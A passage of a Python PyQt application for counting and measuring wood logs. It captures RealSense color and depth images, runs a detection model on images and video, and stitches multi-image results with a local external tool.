self.paly_reset_flag = False
self.widget.show()
self.widget_2.hide()
self.pushButton.clicked.connect(self.open_file_and_show_img)
self.pushButton_2.clicked.connect(self.detect)
self.pushButton_3.clicked.connect(self.saveimage)
self.pushButton_4.clicked.connect(self.videoplay)
self.pushButton_5.clicked.connect(self.videoreset)
self.pushButton_6.clicked.connect(self.videoterminate)
self.pushButton_7.clicked.connect(self.parameteradjust)
self.adjust = False
self.expos_init = [0, 50, 64, 300, 0, 64, 50, 4600]
self.timer.timeout.connect(self.close_win)
self.radioButton.clicked.connect(self.radioButtonimage)
self.radioButton_2.clicked.connect(self.radioButtonvideo)
self.radioButton_3.clicked.connect(self.radioButtonmulti)
self.radioButton_4.clicked.connect(self.radioButtonSaveImage)
self.stopEvent = threading.Event()
self.stopEvent.clear()
self.radioButton.setChecked(True)
self.lineEdit.setReadOnly(True)
self.config_file = './scripts/config.py'
self.class_names = ['Wood', 'Wood']
self.checkpoint_file_list = ['model.pth', 'epoch_1000.pth', 'epoch_1500.pth']
self.pause_det = False
self.time = 0
self.now = ""
def closeEvent(self, event):
"""
对MainWindow的函数closeEvent进行重构
退出软件时结束所有进程
:param event:
:return:
"""
reply = QtWidgets.QMessageBox.question(self,
'本程序',
"是否要退出程序?",
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,
QtWidgets.QMessageBox.No)
if reply == QtWidgets.QMessageBox.Yes:
event.accept()
#print(self.issaveimage)
sys.exit(0)
else:
event.ignore()
def close_win(self):
"""
重写closeEvent方法,实现dialog窗体关闭时执行一些代码
:param event: close()触发的事件
:return: None
"""
#reply = QMessageBox.Warning(self, '本程序',
# "你的软件使用时间或mac地址异常,将强制退出?")
# if reply == QtWidgets.QMessageBox.Yes:
# QMainWindow.close()
# else:
# QMainWindow.close()
self.textEdit.setText("软件使用时间或mac地址异常,将在10后强制退出!")
QApplication.processEvents()
time.sleep(10)
sys.exit(0)
#暂停信号的控制
def detect_command(self):
if(self.pause_det==False):
self.pause_det = True
self.pushButton_3.setText("继续")
else:
self.pause_det= True
self.pushButton_3.setText("暂停")
# 在第二个图窗中显示结果并且在text显示检测结果的相关信息
def radioButtonimage(self):
self.graphicsView.setScene(None)
self.graphicsView_2.setScene(None)
self.graphicsView_3.setScene(None)
self.textEdit.setText("开始单图测试!" + '\n')
QApplication.processEvents()
self.isimage = True
self.isvideo = False
self.ismulti = False
self.issaveimage = False
self.lineEdit.setReadOnly(True)
self.lineEdit_2.setReadOnly(True)
self.stopEvent.set()
self.paly_reset_flag = True
self.widget.show()
self.widget_2.hide()
def radioButtonvideo(self):
self.graphicsView.setScene(None)
self.graphicsView_2.setScene(None)
self.graphicsView_3.setScene(None)
self.textEdit.setText("开始视频测试!" + '\n')
QApplication.processEvents()
self.isvideo = True
self.isimage = False
self.ismulti = False
self.issaveimage = False
self.lineEdit.setReadOnly(True)
self.lineEdit_2.setReadOnly(True)
self.paly_reset_flag = True
self.widget.show()
self.widget_2.hide()
def radioButtonmulti(self):
self.graphicsView.setScene(None)
self.graphicsView_2.setScene(None)
self.graphicsView_3.setScene(None)
self.textEdit.setText("开始多图测试!" + '\n')
QApplication.processEvents()
self.lineEdit.setReadOnly(False)
self.lineEdit_2.setReadOnly(True)
self.isvideo = False
self.isimage = False
self.ismulti = True
self.issaveimage = False
self.stopEvent.set()
self.paly_reset_flag = True
self.widget.hide()
self.widget_2.show()
def radioButtonSaveImage(self):
self.textEdit.setText("请保证摄像头已经插入!" + '\n')
self.lineEdit.setReadOnly(True)
self.isvideo = False
self.isimage = False
self.ismulti = False
self.issaveimage = True
self.paly_reset_flag = False
self.stopEvent.set()
self.widget.show()
self.widget_2.hide()
self.lineEdit_2.setReadOnly(False)
self.cur_acquire_flag = 0
def parameteradjust(self):
self.adjust = True
self.child.show()
def videoplay(self):
if self.issaveimage:
self.pushButton_3.setEnabled(True)
self.notes.show()
self.notes.textBrowser.setText('\n \n')
self.notes.textBrowser.append('\t \t \t 采集一排请按木头堆从左至右的顺序拍摄' + '\n')
self.notes.textBrowser.append(' 请保证一个木头堆的拍摄角度基本一致,尽量在一个水平线上移动拍摄,且保证相邻帧的重叠面积在50%左右,且拍摄清晰没有模糊' + '\n')
self.notes.textBrowser.append(' 具体的顺序如下: \n ')
self.notes.textBrowser.append(' \t \t \t 1.png -> 2.png -> 3.png -> 4.png -> 5.png' + '\n')
self.notes.textBrowser.append(' 采集二排请按木头堆指定从左至右,先下再上,再下再上顺序拍摄' + '\n')
self.notes.textBrowser.append(' 并保证一个木头堆的拍摄角度基本一致,尽量在一个水平线上移动拍摄,且保证相邻帧的重叠面积在50%左右,且拍摄清晰没有模糊' + '\n')
self.notes.textBrowser.append(' 具体的顺序如下: \n')
self.notes.textBrowser.append(
'\t \t \t 第二排:2.png -> 4.png -> 6.png -> 8.png -> 10.png' + '\n' + '\t \t \t 第一排:1.png -> 3.png -> 5.png -> 7.png -> 9.png' + '\n')
self.paly_reset_flag = False
save_folders = './save/imgs'
# if os.path.exists(save_folders):
# shutil.rmtree(save_folders)
if not os.path.exists(save_folders):
os.makedirs(save_folders)
self.now = time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime(time.time()))
pl = pr.pipeline()
con = pr.config()
con.enable_stream(pr.stream.depth, 640, 480, pr.format.z16, 15)
con.enable_stream(pr.stream.color, 640, 480, pr.format.bgr8, 15)
# Start streaming
pl.start(con)
sensor = pl.get_active_profile().get_device().query_sensors()[1]
sensor.set_option(pr.option.enable_auto_exposure, 1)
# print('herehere')
sensor.set_option(pr.option.enable_auto_exposure, 1)
expos = 0
sensor.set_option(pr.option.brightness, self.expos_init[0])
sensor.set_option(pr.option.contrast, self.expos_init[1])
sensor.set_option(pr.option.gain, self.expos_init[2])
sensor.set_option(pr.option.gamma, self.expos_init[3])
sensor.set_option(pr.option.hue, self.expos_init[4])
sensor.set_option(pr.option.saturation, self.expos_init[5])
sensor.set_option(pr.option.sharpness, self.expos_init[6])
sensor.set_option(pr.option.white_balance, self.expos_init[7])
while True:
sticher_flag = self.lineEdit_2.text()
if self.paly_reset_flag == True:
self.lineEdit_2.setEnabled(True)
if sticher_flag is "":
self.save_woods_nums = 1
self.textEdit.setText('需采集排数值为空,必须为大于0的整数,请输入正确的值!')
QApplication.processEvents()
else:
if int(sticher_flag) <= 0 or str(int(sticher_flag)) != sticher_flag or int(sticher_flag) > 2:
self.save_woods_nums = 1
self.textEdit.setText('需采集排数值有误,必须为大于0小于3的整数,请重新输入!')
QApplication.processEvents()
else:
self.save_woods_nums += 1
self.textEdit.setText('开始采集第' + str(self.save_woods_nums) + '个木头堆!!' + '\n')
break
if self.paly_terminate_flag == False:
if self.adjust == True:
# self.adjust = False
expos = self.child.exposfun()
results = self.child.update()
if expos == 'auto':
# Set the exposure anytime during the operation
sensor.set_option(pr.option.enable_auto_exposure, 1)
elif expos == 'reset':
sensor.set_option(pr.option.enable_auto_exposure, 1)
else:
sensor.set_option(pr.option.enable_auto_exposure, 0)
sensor.set_option(pr.option.exposure, int(expos))
brightness = results[0]
contrast = results[1]
gain = results[2]
gamma = results[3]
hue = results[4]
staturation = results[5]
sharpness = results[6]
white_balance = results[7]
# print('brightness', brightness)
if expos == 'reset':
sensor.set_option(pr.option.brightness, brightness)
sensor.set_option(pr.option.contrast, contrast)
sensor.set_option(pr.option.gain, gain)
sensor.set_option(pr.option.gamma, gamma)
sensor.set_option(pr.option.hue, hue)
sensor.set_option(pr.option.saturation, staturation)
sensor.set_option(pr.option.sharpness, sharpness)
sensor.set_option(pr.option.white_balance, white_balance)
else:
if brightness != self.expos_init[0]:
sensor.set_option(pr.option.brightness, brightness)
if contrast != self.expos_init[1]:
sensor.set_option(pr.option.contrast, contrast)
if gain != self.expos_init[2]:
sensor.set_option(pr.option.gain, gain)
if gamma != self.expos_init[3]:
sensor.set_option(pr.option.gamma, gamma)
if hue != self.expos_init[4]:
sensor.set_option(pr.option.hue, hue)
if staturation != self.expos_init[5]:
sensor.set_option(pr.option.saturation, staturation)
if sharpness != self.expos_init[6]:
sensor.set_option(pr.option.sharpness, sharpness)
if white_balance != self.expos_init[7]:
sensor.set_option(pr.option.white_balance, white_balance)
self.expos_init = results
frames = pl.wait_for_frames()
depth_frame = frames.get_depth_frame()
color_frame = frames.get_color_frame()
if not depth_frame or not color_frame:
continue
# Convert images to numpy arrays
depth_image = np.asanyarray(depth_frame.get_data())
color_image = np.asanyarray(color_frame.get_data())
# Apply colormap on depth image (image must be converted to 8-bit per pixel first)
depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.03), cv2.COLORMAP_JET)
if self.savevideo_flag == True:
self.lineEdit_2.setEnabled(False)
self.savevideo_flag = False
if sticher_flag is "":
self.image_num = 0
self.textEdit.setText('需采集排数值为空,必须为大于0的整数,请输入正确的值!')
QApplication.processEvents()
else:
if int(sticher_flag) <= 0 or str(int(sticher_flag)) != sticher_flag or int(
sticher_flag) > 2:
self.image_num = 0
self.textEdit.setText('需采集排数值有误,必须为大于0小于3的整数,请重新输入!')
QApplication.processEvents()
else:
if int(sticher_flag) != self.cur_acquire_flag:
self.image_num = 1
# self.save_woods_nums += 1
self.cur_acquire_flag = int(sticher_flag)
self.textEdit.setText('请看到保存成功标志后,再继续保存下一张!')
self.textEdit.append('当前保存第' + str(self.image_num) + '个木头局部图片')
QApplication.processEvents()
save_folders_other = save_folders + '/' + sticher_flag + '_line'
if not os.path.exists(save_folders_other):
os.makedirs(save_folders_other)
save_sub_folders = save_folders_other + '/' + self.now
if not os.path.exists(save_sub_folders):
os.makedirs(save_sub_folders)
cv2.imwrite(save_sub_folders + '/' + str(self.image_num) + '_depth.tif', depth_image)
cv2.imwrite(save_sub_folders + '/' + str(self.image_num) + '.png', color_image)
cv2.imwrite(save_sub_folders + '/' + str(self.image_num) + '_depth.png', depth_colormap)
self.textEdit.setText('保存成功!')
img1 = color_image
img2 = depth_colormap
if img1 is None:
continue
if img2 is None:
continue
img1 = cv2.resize(img1, (540, 510))
img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2RGB)
img2 = cv2.resize(img2, (540, 510))
x = img1.shape[1] # 获取图像大小
y = img1.shape[0]
self.zoomscale = 1 # 图片放缩尺度
frame1 = QImage(img1, x, y, QImage.Format_RGB888)
pix1 = QPixmap.fromImage(frame1)
self.item1 = QGraphicsPixmapItem(pix1) # 创建像素图元
# self.item.setScale(self.zoomscale)
self.scene1 = QGraphicsScene() # 创建场景
self.scene1.addItem(self.item1)
frame2 = QImage(img2, x, y, QImage.Format_RGB888)
pix2 = QPixmap.fromImage(frame2)
self.item2 = QGraphicsPixmapItem(pix2) # 创建像素图元
# self.item.setScale(self.zoomscale)
self.scene2 = QGraphicsScene() # 创建场景
self.scene2.addItem(self.item2)
self.graphicsView.setScene(self.scene1)
self.graphicsView_2.setScene(self.scene2)
QApplication.processEvents()
else:
self.graphicsView.setScene(None)
self.graphicsView_2.setScene(None)
QApplication.processEvents()
self.graphicsView.setScene(None)
self.graphicsView_2.setScene(None)
QApplication.processEvents()
def videoterminate(self):
if self.paly_terminate_flag == False:
self.paly_terminate_flag = True
self.pushButton_6.setText('继续')
self.pushButton_4.setEnabled(False)
self.pushButton_3.setEnabled(False)
QApplication.processEvents()
else:
self.paly_terminate_flag = False
self.pushButton_6.setText('暂停')
self.pushButton_4.setEnabled(True)
self.pushButton_3.setEnabled(True)
QApplication.processEvents()
# self.graphicsView.setScene(None)
# self.graphicsView_2.setScene(None)
# QApplication.processEvents()
def saveimage(self):
self.savevideo_flag = True
self.image_num += 1
def videoreset(self):
# self.now = time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime(time.time()))
self.image_num = 0
self.paly_reset_flag = True
self.pushButton_3.setEnabled(False)
QApplication.processEvents()
def detect(self):
quit_flag = self.softp.is_over_time()
if quit_flag == True:
self.timer.start(1000) # 计时1s触发关闭程序
else:
if not config.DEBUG:
from woodev.apis import init_detector, inference_detector
# build the model from a config file and a checkpoint file
if self.isimage == True:
start = time.time()
if not config.DEBUG:
self.model = init_detector(self.config_file, self.checkpoint_file_list[0])
result = inference_detector(self.model, self.org_img)
else:
result = []
self.time = time.time() - start
####得到检测结果
if not config.DEBUG:
result_img, inds, cal_results=new_show_result_2(self.org_img, self.filename, result, self.class_names, score_thr=0.5)
###将检测结果显示到图窗上
result_img = cv2.cvtColor(np.asarray(result_img),cv2.COLOR_RGB2BGR)
else:
result_img = np.zeros((520,520,3),dtype=np.uint8)
inds = [0,0]
pixels_output = [0,0]
img = cv2.resize(result_img, (520, 520))
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
x = img.shape[1] # 获取图像大小
y = img.shape[0]
self.zoomscale = 1 # 图片放缩尺度
frame = QImage(img, x, y, QImage.Format_RGB888)
pix = QPixmap.fromImage(frame)
self.item = QGraphicsPixmapItem(pix) # 创建像素图元
# self.item.setScale(self.zoomscale)
self.scene = QGraphicsScene() # 创建场景
self.scene.addItem(self.item)
self.graphicsView_2.setScene(self.scene)
self.textEdit.setText("检测木头个数:" + str(len(inds)) + '\n')
self.textEdit.append("单张图片检测运行时间:" + str(self.time) + 's' + '\n')
self.textEdit.append('每根木头的长轴和短轴长度为:\n')
#print(cal_results)
[self.textEdit.append('长轴:' + str(cal_result[0] / 10) + 'cm' + ',' + '短轴:' + str(cal_result[1] / 10) + 'cm' + '\n') for cal_result in cal_results]
elif self.isvideo == True:
#self.update()
self.pushButton_2.setText("检测中")
QApplication.processEvents()
#self.Video_Detect()
th = threading.Thread(target=self.Video_Detect())
th.start()
elif self.ismulti == True:
self.multi_image()
def Video_Detect(self):
if not config.DEBUG:
from woodev.apis import init_detector, inference_detector
self.graphicsView.setScene(None)
result_dir_path = './results_video/'
if not os.path.exists(result_dir_path):
os.mkdir(result_dir_path)
self.cap = cv2.VideoCapture(self.current_filename)
video_length = self.cap.get(7)
#print(video_length)
frame_num = 0
start = time.time()
#print(self.current_filename)
fourcc = cv2.VideoWriter_fourcc('m', 'p', '4', 'v')
out_file_name = result_dir_path + self.current_filename.split('/')[-1]
self.frameRate = self.cap.get(cv2.CAP_PROP_FPS)
out = cv2.VideoWriter(out_file_name, fourcc, self.frameRate, (520, 480))
while self.cap.isOpened():
success, frame = self.cap.read()
if True == self.stopEvent.is_set():
self.stopEvent.clear()
self.graphicsView.setScene(None)
self.graphicsView_2.setScene(None)
QApplication.processEvents()
break
if success:
#print("processing....")
frame_num += 1
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
img_i = frame.copy()
img_i = cv2.resize(img_i, (520, 520))
img_i = cv2.cvtColor(img_i, cv2.COLOR_BGR2RGB)
img_i = QImage(img_i, img_i.shape[1], img_i.shape[0], QImage.Format_RGB888)
pix = QPixmap.fromImage(img_i)
self.item = QGraphicsPixmapItem(pix) # 创建像素图元
# self.item.setScale(self.zoomscale)
self.scene = QGraphicsScene() # 创建场景
self.scene.addItem(self.item)
self.graphicsView.setScene(self.scene)
#cv2.waitKey(1)
if not config.DEBUG:
self.model = init_detector(self.config_file, self.checkpoint_file_list[0])
result = inference_detector(self.model, frame)
result_img, inds, cal_results=new_show_result_21(frame, result, self.class_names, score_thr=config.SCORE_THR)
else:
result = []
result_img = frame.copy()
inds = [0,0]
pixels_output = [0,0]
###将检测结果显示到图窗上以及保存
result_img = cv2.cvtColor(np.array(result_img,dtype=np.uint8),cv2.COLOR_RGB2BGR)
img_o = cv2.resize(result_img, (520, 520))
img_o = cv2.cvtColor(img_o, cv2.COLOR_BGR2RGB)
out.write(img_o)
img_o = QImage(img_o, img_o.shape[1], img_o.shape[0], QImage.Format_RGB888)
pix = QPixmap.fromImage(img_o)
self.item = QGraphicsPixmapItem(pix) # 创建像素图元
# self.item.setScale(self.zoomscale)
self.scene = QGraphicsScene() # 创建场景
self.scene.addItem(self.item)
self.graphicsView_2.setScene(self.scene)
QApplication.processEvents()
self.textEdit.setText("当前帧检测木头个数:"+ str(len(inds)) + '\n')
self.textEdit.append('当前帧每根木头的像素的个数:\n')
[self.textEdit.append('长轴:' + str(cal_result[0] / 10) + 'cm' + ',' + '短轴:' + str(cal_result[1] / 10) + 'cm' + '\n') for cal_result in cal_results]
#cv2.waitKey(1)
#print('hah')
# while(self.pause_det):
#
# # self.textEdit.setText("检测已经暂停,可继续检测" + '\n')
# # # 检测时间为总时长除以视频帧数
# # self.time = time.time() - start
# # self.textEdit.setText("单帧检测运行时间:" + str(self.time) / frame_num + 's' + '\n')
# print('wait')
#暂停等待
if video_length == frame_num:
self.stopEvent.clear()
self.graphicsView_2.setScene(None)
self.graphicsView.setScene(None)
self.textEdit.setText("当前视频已经处理完毕,请重新添加视频文件" + '\n')
break
else:
break
# 检测时间为总时长除以视频帧数
self.pushButton_2.setText("检测")
self.time = time.time() - start
self.textEdit.setText("单帧检测运行时间:" + str(self.time/ frame_num) + 's' + '\n')
self.cap.release()
out.release()
#打开文件选择框,选择要测试的图片 路径中不能包括中文字符
def multi_image(self):
if not config.DEBUG:
from woodev.apis import init_detector, inference_detector
self.graphicsView_3.setScene(None)
QApplication.processEvents()
img_paths = self.img_list
img_paths_raw = self.img_list_raw
out_folder = './results/'
sticher_folder = './input-42-data/'
if os.path.exists(sticher_folder):
shutil.rmtree(sticher_folder)
if not os.path.exists(sticher_folder):
os.makedirs(sticher_folder)
if os.path.exists(out_folder):
shutil.rmtree(out_folder)
if not os.path.exists(out_folder):
os.makedirs(out_folder)
#shutil.copy('sticher/image-stitching', 'results/image-stitching')
#shutil.copy('sticher/config.cfg', './config.cfg')
if len(img_paths_raw) < len(img_paths):
self.textEdit.setText('深度数据有缺失,请保证每张原图有对应的深度数据,为.tif文件!,如果文件缺失,将默认距离为2m' + '\n')
QApplication.processEvents()
img_paths_raw = []
for i in range(len(img_paths)):
img_paths_raw.append('none')
img_count = 0
mask_index = 0
sticher_flag = self.lineEdit.text()
for img_path, img_path_raw in zip(img_paths, img_paths_raw):
out_file = out_folder + img_path.split('/')[-1]
img = cv2.imread(img_path)
if not config.DEBUG:
self.model = init_detector(self.config_file, self.checkpoint_file_list[0])
result = inference_detector(self.model, img)
else:
result = []
####得到检测结果
# if(img_count%2==0):
# mask_index=0
# else:
# mask_index=1
if sticher_flag is "":
self.textEdit.setText('拼接标志为为空,请输入正确的值!')
QApplication.processEvents()
else:
if int(sticher_flag) <= 0 or str(int(sticher_flag)) != sticher_flag:
self.textEdit.setText('拼接顺序值有误,必须为大于0的整数,请重新输入!')
QApplication.processEvents()
else:
if int(sticher_flag)== 1:
mask_index = img_count % 3
img_count += 1
elif int(sticher_flag) == 2:
#one_row_num = len(img_paths) // 2
mask_index = img_count % 6
mask_index = mask_index // 2
img_count += 1
if not config.DEBUG:
_ = new_show_result_3(img, result, self.class_names, img_path_raw,
score_thr=0.3, out_file=out_file, mask_index=mask_index)
###将检测结果显示到图窗上
else:
result_img = np.zeros((520, 520, 3), dtype=np.uint8)
inds = [0, 0]
pixels_output = [0, 0]
#print(img_paths)
# print('sticher_flag:', sticher_flag)
# print(sticher_flag is None)
# print(int(sticher_flag) <= 0)
# print(int(sticher_flag) != sticher_flag)
if sticher_flag is "":
self.textEdit.setText('拼接标志为为空,请输入正确的值!')
QApplication.processEvents()
else:
if int(sticher_flag) <= 0 or str(int(sticher_flag)) != sticher_flag:
self.textEdit.setText('拼接顺序值有误,必须为大于0的整数,请重新输入!')
QApplication.processEvents()
else:
if int(sticher_flag) == 1:
commad = "./sticher/NISwGSP"
file_name = img_paths[0].split('/')[-3] + '-' + img_paths[0].split('/')[-2]
sub_siticher_folders = sticher_folder + file_name
sub_siticher_folders_mask = sub_siticher_folders + '-mask'
if not os.path.exists(sub_siticher_folders):
os.makedirs(sub_siticher_folders)
if not os.path.exists(sub_siticher_folders_mask):
os.makedirs(sub_siticher_folders_mask)
print(img_paths)
for img_path in img_paths:
filename = img_path.split('/')[-1]
shutil.copy(out_folder + filename, sub_siticher_folders + '/' + filename)
filename_mask = filename.split('.')[0] + '_mask.png'
print(filename_mask)
shutil.copy(out_folder + filename_mask, sub_siticher_folders_mask + '/' + filename_mask)
#print(commad)
file_name_txt = file_name +'-STITCH-GRAPH'
creat_match_graph_txt(img_count, root_path=sub_siticher_folders, root_path_mask=sub_siticher_folders_mask, file_name=file_name_txt)
commad += ' ' + file_name
cmd = os.system(commad)
if cmd != 0:
self.textEdit.setText('图片数据有误!' + '\n')
QApplication.processEvents()
###########################################拼图模块
#保存拼接的txt对应信息
#调用拼接程序 进行拼接
#需要将拼接后的图片和掩码移动到 results 文件夹中
#
shutil.move(sticher_folder + '0_results/' + file_name + '-result' + '/' + file_name + '-[NISwGSP][2D][BLEND_LINEAR].png', out_folder + 'out.png')
shutil.move(sticher_folder + '0_results/' + file_name + '-mask-result' + '/' + file_name + '-[NISwGSP][2D][BLEND_LINEAR].png', out_folder + 'out_mask.png')
#print('Done!')
#############################################结果整合模块,,函数定义在merger_result.py
#得到保存的结果文件列表 检测csv文件列表 拼接的图片名称
input_image_list = [out_folder + img_path.split('/')[-1] for img_path in img_paths]
input_csv_file_list = [ img_path[:-4]+'.csv' for img_path in input_image_list]
out_final_mask = out_folder + 'out_mask.png'
log_info = get_final_result(input_image_list,input_csv_file_list, out_final_mask)#这个函数运行结束后会保存merger_final.csv作为最终的结果
print('log_info:', log_info)
if log_info == '正常':
img, cal_list, count_num = get_result_from_meger_file('./meger_final.csv', out_folder +'out.png')
img1 = cv2.imread(out_folder + 'out.png')
img2 = img
img = cv2.resize(img2, (1100, 550))
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
frame = QImage(img, img.shape[1], img.shape[0], QImage.Format_RGB888)
pix = QPixmap.fromImage(frame)
self.item = QGraphicsPixmapItem(pix) # 创建像素图元
# self.item.setScale(self.zoomscale)
self.scene = QGraphicsScene() # 创建场景
self.scene.addItem(self.item)
self.graphicsView_3.setScene(self.scene)
# img1 = cv2.resize(img1, (520, 520))
# img2 = cv2.resize(img2, (520, 520))
# x = img1.shape[1] # 获取图像大小
# y = img1.shape[0]
# self.zoomscale = 1 # 图片放缩尺度
# frame1 = QImage(img1, x, y, QImage.Format_RGB888)
# pix1 = QPixmap.fromImage(frame1)
# self.item1 = QGraphicsPixmapItem(pix1) # 创建像素图元
# # self.item.setScale(self.zoomscale)
# self.scene1 = QGraphicsScene() # 创建场景
# self.scene1.addItem(self.item1)
#
# frame2 = QImage(img2, x, y, QImage.Format_RGB888)
# pix2 = QPixmap.fromImage(frame2)
# self.item2 = QGraphicsPixmapItem(pix2) # 创建像素图元
# # self.item.setScale(self.zoomscale)
# self.scene2 = QGraphicsScene() # 创建场景
# self.scene2.addItem(self.item2)
#
# self.graphicsView.setScene(self.scene1)
# self.graphicsView_2.setScene(self.scene2)
self.textEdit.setText("检测木头总的个数:" + str(count_num) + '\n')
self.textEdit.append('具体的结果保存在results文件夹,以及meger_final.csv中:\n')
[self.textEdit.append('第' + str(i) + '根木头:\n' + '长轴:' + str(cal_result[0] / 10) + 'cm' + ',' + '\n短轴:' + str(cal_result[1] / 10) + 'cm' + '\n') for i, cal_result in enumerate(cal_list)]
QApplication.processEvents()
#这里读取csv的到木头的个数 该文件的注释格式和之前检测基本相同 最后多了四个项 为 该木头在拼接后的图中的bbox
else:
self.textEdit.setText(str(log_info) + '\n')
QApplication.processEvents()
elif int(sticher_flag) == 2:
file_name = img_paths[0].split('/')[-3] + '-' + img_paths[0].split('/')[-2]
img_paths_odd = img_paths[::2]
img_paths_even = img_paths[1::2]
img_paths_raw_odd = img_paths_raw[::2]
img_paths_raw_even = img_paths_raw[1::2]
commad = "./sticher/NISwGSP"
sub_siticher_folders = sticher_folder + file_name
sub_siticher_folders_mask = sub_siticher_folders + '-mask'
sub_siticher_folders1 = sticher_folder + file_name+'_1'
sub_siticher_folders_mask1 = sub_siticher_folders1 + '-mask'
if not os.path.exists(sub_siticher_folders):
os.makedirs(sub_siticher_folders)
if not os.path.exists(sub_siticher_folders1):
os.makedirs(sub_siticher_folders1)
if not os.path.exists(sub_siticher_folders_mask):
os.makedirs(sub_siticher_folders_mask)
if not os.path.exists(sub_siticher_folders_mask1):
os.makedirs(sub_siticher_folders_mask1)
count=0
for img_path in img_paths:
filename = img_path.split('/')[-1]
filename_mask = filename.split('.')[0] + '_mask.png'
filename_bmask = filename.split('.')[0] + '_bmask.png'
shutil.copy(out_folder + filename, sub_siticher_folders + '/' + filename)
shutil.copy(out_folder + filename, sub_siticher_folders1 + '/' + filename)
if count%2==0:
shutil.copy(out_folder + filename_mask, sub_siticher_folders_mask + '/' + filename_mask)
shutil.copy(out_folder + filename_bmask, sub_siticher_folders_mask1 + '/' + filename_mask)
else:
shutil.copy(out_folder + filename_mask, sub_siticher_folders_mask1 + '/' + filename_mask)
shutil.copy(out_folder + filename_bmask, sub_siticher_folders_mask + '/' + filename_mask)
count+=1
file_name_txt = file_name + '-STITCH-GRAPH'
creat_match_graph_txt(img_count, root_path=sub_siticher_folders,
root_path_mask=sub_siticher_folders_mask, file_name=file_name_txt)
file_name_1 = file_name + '_1'
file_name_txt = file_name + '_1' + '-STITCH-GRAPH'
creat_match_graph_txt(img_count, root_path=sub_siticher_folders1,
root_path_mask=sub_siticher_folders_mask1, file_name=file_name_txt)
commad_1 = commad + ' ' + file_name
cmd = os.system(commad_1)
if cmd != 0:
self.textEdit.setText('图片数据有误!' + '\n')
QApplication.processEvents()
commad_1 = commad + ' ' + file_name+'_1'
cmd = os.system(commad_1)
if cmd != 0:
self.textEdit.setText('图片数据有误!' + '\n')
QApplication.processEvents()
shutil.copy(
sticher_folder + '0_results/' + file_name + '-result' + '/' + file_name + '-[NISwGSP][2D][BLEND_LINEAR].png',
out_folder + 'out1.png')
shutil.copy(
sticher_folder + '0_results/' + file_name + '-mask-result' + '/' + file_name + '-[NISwGSP][2D][BLEND_LINEAR].png',
out_folder + 'out_mask1.png')
shutil.copy(
sticher_folder + '0_results/' + file_name_1 + '-result' + '/' + file_name_1 + '-[NISwGSP][2D][BLEND_LINEAR].png',
out_folder + 'out2.png')
shutil.copy(
sticher_folder + '0_results/' + file_name_1 + '-mask-result' + '/' + file_name_1 + '-[NISwGSP][2D][BLEND_LINEAR].png',
out_folder + 'out_mask2.png')
# input_image_list = ['./tmp_merger_final1.png', './tmp_merger_final2.png']
# input_csv_file_list = ['./tmp_merger_final1.csv', './tmp_merger_final2.csv']
# out_final_mask = out_folder + 'out_mask.png'
out_final_mask = [out_folder + 'out_mask1.png',
out_folder + 'out_mask2.png']
input_csv_file_list = [out_folder + img_path.split('/')[-1].rstrip('.png') + '.csv' for img_path in img_paths]
input_img_mask_list = [out_folder + img_path.split('/')[-1] for img_path in img_paths]
log_info = get_final_result_multirows(input_img_mask_list, input_csv_file_list, out_final_mask)
if log_info == '正常':
img, cal_list, count_num = get_result_from_meger_file('./' +'meger_final.csv', out_folder + 'out2.png')
img1 = cv2.imread(out_folder + 'out2.png')
img2 = img
x = img1.shape[1] # 获取图像大小
y = img1.shape[0]
img = cv2.resize(img2, (1100, 550))
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
frame = QImage(img, img.shape[1], img.shape[0], QImage.Format_RGB888)
pix = QPixmap.fromImage(frame)
self.item = QGraphicsPixmapItem(pix) # 创建像素图元
# self.item.setScale(self.zoomscale)
self.scene = QGraphicsScene() # 创建场景
self.scene.addItem(self.item)
self.graphicsView_3.setScene(self.scene)
# self.zoomscale = 1 # 图片放缩尺度
# frame1 = QImage(img1, x, y, QImage.Format_RGB888)
# pix1 = QPixmap.fromImage(frame1)
# self.item1 = QGraphicsPixmapItem(pix1) # 创建像素图元
# # self.item.setScale(self.zoomscale)
# self.scene1 = QGraphicsScene() # 创建场景
# self.scene1.addItem(self.item1)
#
# frame2 = QImage(img2, x, y, QImage.Format_RGB888)
# pix2 = QPixmap.fromImage(frame2)
# self.item2 = QGraphicsPixmapItem(pix2) # 创建像素图元
# # self.item.setScale(self.zoomscale)
# self.scene2 = QGraphicsScene() # 创建场景
# self.scene2.addItem(self.item2)
#
# self.graphicsView.setScene(self.scene1)
# self.graphicsView_2.setScene(self.scene2)
self.textEdit.setText("检测木头总的个数:" + str(count_num) + '\n')
self.textEdit.append('具体的结果保存在results文件夹,以及meger_final.csv中:\n')
[self.textEdit.append(
'第' + str(i) + '根木头:\n' + '长轴:' + str(cal_result[0] / 10) + 'cm' + ',' + '\n短轴:' + str(cal_result[1] / 10) + 'cm' + '\n') for
i, cal_result in enumerate(cal_list)]
QApplication.processEvents()
else:
self.textEdit.setText(str(log_info) + '\n')
QApplication.processEvents()
####################################################################old version
# sub_siticher_folders = sticher_folder + file_name
# sub_siticher_folders_mask = sub_siticher_folders + '-mask'
# if not os.path.exists(sub_siticher_folders):
# os.makedirs(sub_siticher_folders)
# if not os.path.exists(sub_siticher_folders_mask):
# os.makedirs(sub_siticher_folders_mask)
# # print("img_paths:", img_paths)
# # print('odd:', img_paths_odd)
# # print("even:", img_paths_even)
# for img_path_odd in img_paths_odd:
# filename = img_path_odd.split('/')[-1]
# shutil.copy(out_folder + filename, sub_siticher_folders + '/' + filename)
# filename_mask = filename.split('.')[0] + '_mask.png'
# # print(filename_mask)
# shutil.copy(out_folder + filename_mask, sub_siticher_folders_mask + '/' + filename_mask)
# # print(commad)
# file_name_txt = file_name + '-STITCH-GRAPH'
# creat_match_graph_txt(img_count // 2, root_path=sub_siticher_folders,
# root_path_mask=sub_siticher_folders_mask, file_name=file_name_txt)
# commad_1 = commad + ' ' + file_name
# cmd = os.system(commad_1)
# if cmd != 0:
# self.textEdit.setText('图片数据有误!' + '\n')
# QApplication.processEvents()
#
# # second image ###
# file_name_2 = file_name +'_2'
# sub_siticher_folders_2 = sticher_folder + file_name_2
